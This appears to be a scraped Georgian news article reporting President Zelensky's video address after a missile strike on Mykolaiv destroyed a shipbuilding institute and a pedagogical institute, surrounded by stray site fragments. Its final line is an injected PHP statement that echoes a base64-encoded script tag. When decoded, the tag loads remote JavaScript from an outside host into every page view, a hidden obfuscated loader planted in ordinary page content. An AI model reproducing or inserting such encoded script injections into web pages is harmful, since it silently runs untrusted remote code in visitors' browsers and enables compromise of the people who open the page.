celsiusi
ავერსი საქკაბელი

უკრაინის პრეზიდენტის, ვოლოდიმირ ზელენსკის განცხადებით, უკრაინა აღადგენს რუსეთის მიერ განადგურებულ ყველა საგანმანათლებლო დაწესებულებას, უკრაინელები დარჩებიან ცივილიზებული, ხოლო რუსული საზოგადოება იქნება დასახიჩრებული თაობების განმავლობაში. ამის შესახებ მან ვიდეომიმართვისას განაცხადა.

ზელენსკის თქმით, პარასკევს დილით ნიკოლაევზე განხორციელებული სარაკეტო დარტყმის შედეგად ორი ინსტიტუტის – ​გემთმშენებლობისა და პედაგოგიურის შენობები განადგურდა.

„ნორმალურ, ადამიანურ ენაში არ არსებობს ისეთი სიტყვები, რომლებიც დაახასიათებს, რა მდგომარეობამდეც დეგრადირდა რუსული სახელმწიფო. ეს არის ორმაგი დანაშაული – გაანადგურონ პედაგოგიური ინსტიტუტები, რომ არ იყოს საგანმანათლებლო დაწესებულება და პედაგოგები ვერ ასწავლიდნენ. მაგრამ, ტერორისტებს არ ჰქონდეთ იმედი, რომ ეს მათ რაიმეს მისცემს. ჩვენ აუცილებლად აღვადგენთ ყველაფერს, რაც მათ დაანგრიეს. რაც მთავარია, ჩვენ შევინარჩუნებთ ჩვენს ადამიანობას და ცივილიზებულობას. რუსული საზოგადოება, ამდენი მკვლელითა და ჯალათით, თაობების განმავლობაში დარჩება დასახიჩრებული, თანაც საკუთარი ბრალის გამო“, – აღნიშნა ზელენსკიმ.

673
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");